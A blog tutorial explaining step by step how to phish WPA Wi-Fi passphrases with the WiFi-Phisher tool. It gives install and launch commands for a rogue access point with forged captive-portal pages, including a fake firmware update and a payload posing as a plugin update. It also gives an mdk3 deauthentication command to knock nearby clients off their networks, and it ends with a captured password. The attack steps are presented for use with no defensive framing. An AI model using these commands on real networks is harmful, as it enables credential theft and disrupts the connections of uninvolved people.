How To Phish A WiFi Wpa-Passphrase Using WiFi-Phisher

by hash3liZer . 22 June 2018

How To Phish A WiFi Wpa-Passphrase Using WiFi-Phisher

In this tutorial, we will use WiFi-Phisher, a phishing utility for rogue networks to sneak passphrases of nearby wireless networks by presenting users a forged document. Tough, using it is never considered a good practice but is recommended sometimes whilst there is a shortage of time. And there's almost no assurity that it's always gonna work. But as it will help you grasp the basics of Phishing over the air, we will see it's usage.

Evolving of WPA has greatly enchanced the wireless security over the air and almost made it impossible to crack these security protocols. Phishing has always been a reliable means of compromising personal details but a bit nasty. WiFi-Phisher will help us simplify this task.

WiFi-Phisher make use of two interfaces, one for Access Point and other to perform DoS attacks and optionally a third interface to forward traffic from. By default, it redirects all the traffic to forged document location. Hence, we have required two adapters here and optionally an internet connection on another interface. Tough, you can skip the DoS step, but it's maybe two time to consume to get the attention of the nearby users.

STEP 1

Clone

Clone the latest WiFi-Phisher version from GitHub and install it...

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
wifiphisher installation

STEP 2

Launch

As already told, WiFi-Phisher makes use of two interfaces, one for Access Point and the other for DoS attack. But you can skip the DoS attack if you want to. Launch the script by one of the suitable ways:

wifiphisher -aI wlan1 -eI wlan0 -iI eth0 --essid "WiFiPhisher"

Note the arguments above in the directive:

  • -aI: Access Point Interface.
  • -eI: Interface to send dissociation packets from.
  • -iI: Interface with Internet connection
  • --essid: Name of Fake Access Point

If you don't want to provide internet access nor want to perform dissociation step:

wifiphisher -aI wlan0 --nodeauth --essid "WiFiPhisher"

If you want to scan the area first:

wifiphisher -aI wlan0 --nodeauth --noextensions
wifiphisher

STEP 2

Scenario

Choose one of the attacking scenarios. Currently given are:

  1. Firmware-upgrade.
  2. Network Manager Connect.
  3. Plugin Update: This will present victims a payload as a plugin update.
  4. OAuth Login Page.
scenario

STEP 3

Dissociation

Now, we will dissociate the clients from the access point. If you have already provided an extension interface at the first place, then doing this is not necassery. WiFiphisher will handle rest of the task itself. All you have to do is wait and see. But sometimes it takes a lot of time for it to dissociate all the clients perfectly as required.

If this is the case, manually performing dissociation will be helpful. We will use mdk3 for this purpose. Create a new blacklist file and add BSSID's of all nearby access points:

touch /tmp/blacklist.txt
echo 34:BF:90:4A:BB:57 >> /tmp/blacklist.txt
echo 00:0E:F4:DE:D9:61 >> /tmp/blacklist.txt
...

Then kick-start mdk3:

mdk3 wlan0 d -b /tmp/blacklist.txt -c

Note the paramters above:

  • wlan0, interface to send packets from.
  • d, Dissociation Attack. Kick Everybody found in AP.
  • -b: blacklist file containing the AP's BSSID.
  • -c, Channel hopping on all 14 channel, each after 5 seconds.
mdk3

STEP 4

Passphrase Posting

Now, when a client connects to the Rogue AP. Captive Portal will work and she will be prompted to our forged document. Whatever happens in the network, all incoming and ongoing requests, they will be printed on the terminal. When the client post the request along server containing the pre-shared key. It will be printed all sent data too. So,

passphrase posting

The password is: [email protected]

Conclusion

So, we saw how we could use WiFi-Phisher utility to automate all the Rogue AP stuff for us. It provides us the basic CLI interface and various command line options to deal with the script. Moreover, it also has the support of captive portal which make it more coercive for the clients and have built in four different phishing scenarios that could be used as required.